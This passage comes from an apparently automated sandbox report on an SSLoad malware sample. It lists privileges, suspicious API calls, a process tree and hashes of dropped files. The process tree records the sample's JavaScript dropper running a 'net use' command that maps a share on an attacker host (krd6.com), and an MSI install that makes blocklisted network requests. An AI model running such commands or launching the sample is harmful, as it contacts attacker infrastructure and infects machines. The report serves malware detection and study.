3080 msiexec.exe Token: SeUndockPrivilege 3080 msiexec.exe Token: SeSyncAgentPrivilege 3080 msiexec.exe Token: SeEnableDelegationPrivilege 3080 msiexec.exe Token: SeManageVolumePrivilege 3080 msiexec.exe Token: SeImpersonatePrivilege 3080 msiexec.exe Token: SeCreateGlobalPrivilege 3080 msiexec.exe Token: SeCreateTokenPrivilege 3080 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3080 msiexec.exe Token: SeLockMemoryPrivilege 3080 msiexec.exe Token: SeIncreaseQuotaPrivilege 3080 msiexec.exe Token: SeMachineAccountPrivilege 3080 msiexec.exe Token: SeTcbPrivilege 3080 msiexec.exe Token: SeSecurityPrivilege 3080 msiexec.exe Token: SeTakeOwnershipPrivilege 3080 msiexec.exe Token: SeLoadDriverPrivilege 3080 msiexec.exe Token: SeSystemProfilePrivilege 3080 msiexec.exe Token: SeSystemtimePrivilege 3080 msiexec.exe Token: SeProfSingleProcessPrivilege 3080 msiexec.exe Token: SeIncBasePriorityPrivilege 3080 msiexec.exe Token: SeCreatePagefilePrivilege 3080 msiexec.exe Token: SeCreatePermanentPrivilege 3080 msiexec.exe Token: SeBackupPrivilege 3080 msiexec.exe Token: SeRestorePrivilege 3080 msiexec.exe Token: SeShutdownPrivilege 3080 msiexec.exe Token: SeDebugPrivilege 3080 msiexec.exe Token: SeAuditPrivilege 3080 msiexec.exe Token: SeSystemEnvironmentPrivilege 3080 msiexec.exe Token: SeChangeNotifyPrivilege 3080 msiexec.exe Token: SeRemoteShutdownPrivilege 3080 msiexec.exe Token: SeUndockPrivilege 3080 msiexec.exe Token: SeSyncAgentPrivilege 3080 msiexec.exe Token: SeEnableDelegationPrivilege 3080 msiexec.exe Token: SeManageVolumePrivilege 3080 msiexec.exe Token: SeImpersonatePrivilege 3080 msiexec.exe Token: SeCreateGlobalPrivilege 3080 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exe7zFM.exemsiexec.exemsiexec.exetaskmgr.exepid process 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 3316 7zFM.exe 4628 msedge.exe 3316 7zFM.exe 3316 7zFM.exe 3080 msiexec.exe 3444 msiexec.exe 3444 msiexec.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exetaskmgr.exepid process 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
StartMenuExperienceHost.exepid process 3748 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4628 wrote to memory of 1408 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1408 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1680 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1796 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1796 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe PID 4628 wrote to memory of 1000 4628 msedge.exe msedge.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://malware-traffic-analysis.net/2024/04/17/2024-04-17-SSLoad-malware-and-artifacts.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9428a46f8,0x7ff9428a4708,0x7ff9428a47182⤵PID:1408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:22⤵PID:1680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:82⤵PID:1000
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:2564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:3460
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵PID:1672
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4476 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:1448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:4492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5184 /prefetch:82⤵PID:1420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:12⤵PID:2188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6044 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:4204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:1336
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4548
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2904
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1412
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\2024-04-17-SSLoad-malware-and-artifacts.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3316
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txt1⤵PID:4568
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js1⤵PID:4744
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"1⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:3452
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:2060
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"1⤵
- Modifies system certificate store
PID:4672
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:460
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js1⤵PID:556
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.js"1⤵PID:5056
-
C:\Windows\system32\net.exenet use A: \\krd6.com@80\share\ /persistent:no1⤵
- Process spawned unexpected child process
PID:5024
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txt1⤵PID:912
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3080
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AE37186F3A7DA742CD4F5E228706B755 C2⤵
- Loads dropped DLL
PID:3736 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 448AB9541D633E9FD8198653CCCBE003 C2⤵
- Loads dropped DLL
PID:5088 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:808
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CE9E199AA7B76E7B39604F73F6D566602⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1952
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:2756
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /f "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵PID:2968
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3444
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2408
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e5a8be7.rbsFilesize
1KB
MD5a0a7a241b8c58898ba262f98d0157658
SHA15d5a2381b037e1a2a503d8bed862f596252dbc28
SHA2568b4ff903e0e136fcb56605660b7aa8d51e65a0450fa5b7710824a2f826be9c49
SHA5125f868f4044c3df11fa4bb4f23007efad830b46bb0f2ee772a6634876eb8499c132583f43f875443e0959108628506dbb18d670871258fce3bfcada741e632140
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157FFilesize
1KB
MD5bb06ce99ccfa5cb285e5df127cdd634c
SHA1b84c5a177c1a08f037fc7e7681625f7caa225cf5
SHA25610f5e81a81da6eaea873d03dde62fef03d4df1c176a43f6af807dfe997af6ae3
SHA51233f690eeaf9d5850a545ff2e88778224861b87e7ec9ecfd832ddfd287bf213a469676df5cf09e532ddb7060c8a31f13e99f237461f936898987500282a8ab1cd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554EFilesize
1KB
MD5b340f5f01c138c326f8db7c21556b9df
SHA12bf8956694e3ee5796c31a6aa4ea7707650732ca
SHA256fa0b5479235a952591306e204e27d33c4870f48f0c1708ca77f5c1a9a4f3221e
SHA512e056ea7305482f2b561427190aa84ccc7407e6e0a27c44595806b2e6511533742f6e7c1317d9005f959593e6e69990130402580bc588fcd398b0ae6492d7b3f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157FFilesize
540B
MD564dc1cab145347d4f9ca777a6c2aba2d
SHA1ec7d025bfce46b9c7e1c64249e3bf2216e866d0f
SHA256ced28eeb41197c4efff6ede915bc42b3a1a7b99b12d5ecb08777070e26e36b72
SHA512fabbde1c8353dc7d5cee85612f11da399045f97bd315155e26c20a9080fffa510ae6ace81eb886a3be8a856ea44a066f9cc24972eccc86bf16528bfeceda365d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554EFilesize
536B
MD5bf88d231c2335215d653403ec64953b3
SHA18161d39ee8bd0c84b9fb9ccb1761ae08407bce9b
SHA2560d75a6a173a1fc11561ee105f7f5c92af95ea9fe12d4ecccdacf1a435745c9c2
SHA5128f8e7da4fd7b97708d69c13217358fdd428b3ebfdea6406cb5d8bf2100ff58ecb8e671e7c4b9d617c41a1d206a5e1a6d4df1b664c5667993457dd775a0988cc4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54b4f91fa1b362ba5341ecb2836438dea
SHA19561f5aabed742404d455da735259a2c6781fa07
SHA256d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
SHA512fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5eaa3db555ab5bc0cb364826204aad3f0
SHA1a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
SHA256ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
SHA512e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5d20161000a5f66b5af252b235e4204cb
SHA1c157a794e40f0756be5b44ad8dd2fa6943c97a38
SHA2564b6644217af9f9f7865058afa8c8980006a43ff4cdc46a7d14ff385db9e89675
SHA512f22d0a99ec0792748e659d4a490d1bf91c32a6a8c99ff4d209a9788dacbed96b5c0403e4ad7a4d7a9ada0e0c530a935a07fc9d9aad81755dec3ff431d5c860e7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5fd23835304281e128136b36da36b7c31
SHA1de2026562b0db01c0e215d978744cf50f1300e3e
SHA2568c916f389c5d2b34edc5110035add12a60ea387c9fbbcc1b8aba4579efc4757e
SHA51229647e897ea6a6fa8920e393d367d3dad6ea09b67bd280bd56a48d28349cdbdbdc6eec54060da2d6a6ced48d86ce83075a7b6c9e615194c8869a41b114c26725
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD592bb7e4adadf14e7f302b67d4357cc07
SHA1d366c3949e5eb71cb551455ad816e9fe3b2a6a48
SHA256304f0c99bbdbe74fdecefdfecdcfc2e3ba9d4a4d77b4d3d57033f044adbef3d3
SHA51245389e50276ef2bab5ae71fc8ee5158b51fa23619b15816366c67c246254523803f7344ffa33f539fe4869e3925dc745b5e8dd6c35a204443546ab9184b577a5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5589a1a59a9dd78f234bb4a07cb3a51d7
SHA19949c6bd0faaef4ee3ee2842ecaf53a3f7ada2bd
SHA256d7c75706d0853b977a47d90386d7e8130e980507112dce77b57191f32caccabc
SHA512ca777ab1fb4d69982f886a5e97c6c72d04b97af2a7157c781272a63d1103254dc0f1c96506d05c8bfad32ba0826dbcdc1309a358eaf9071ec15e71bb68f6e493
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD50ca4f1179d157759afbb3719f3e43470
SHA155120bed645c3ce358e30496596c90edf9fec8cb
SHA2569026c04cd985bd977ab6daca24d50af0e5b21bfafe791155df8e2b4dbe8db16d
SHA512b46c042e90261f5c44d65ae1298edd79cb5d1e61f5a47bfdf1258c6f0d1d02441549ee3e705dae2501480adc01e2d58ed61cb9ac677e3e4fc5c0cdcd55df74db
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5de79436f968aec8e6c99c8282f250a7e
SHA179472efcd152528fb5031beb846fcf9a101f66b9
SHA256a28fc8a2b6522a4fefa38903bdd646c66713f859026146816222bded06378d77
SHA51212b1fd91014a472906f0284bf26dd01132578434c92cb43f30864abd3dbbfdeaa19a27a6384c02593bbb957d271d7bf17d025f8c738f9aa85fd01239e9c66d85
-
C:\Users\Admin\AppData\Local\Temp\MSI5332.tmpFilesize
436KB
MD5475d20c0ea477a35660e3f67ecf0a1df
SHA167340739f51e1134ae8f0ffc5ae9dd710e8e3a08
SHA256426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd
